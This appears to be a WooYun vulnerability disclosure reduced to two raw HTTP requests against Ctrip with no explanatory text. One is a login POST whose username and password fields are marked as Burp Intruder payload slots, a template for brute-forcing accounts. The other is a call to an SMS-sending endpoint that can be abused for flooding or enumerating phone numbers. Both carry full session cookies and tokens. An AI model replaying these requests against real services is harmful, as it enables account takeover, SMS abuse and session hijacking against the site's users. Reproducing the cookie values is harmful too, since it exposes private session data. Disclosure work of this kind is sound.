WooYun.org

POST /globalwap/account/login/ HTTP/1.1
Host: accounts.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://accounts.ctrip.com/globalwap/account/login/
Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
UserName=§15555555555§&Password=§111111111§

GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1
Host: b.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888
Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1
Connection: keep-alive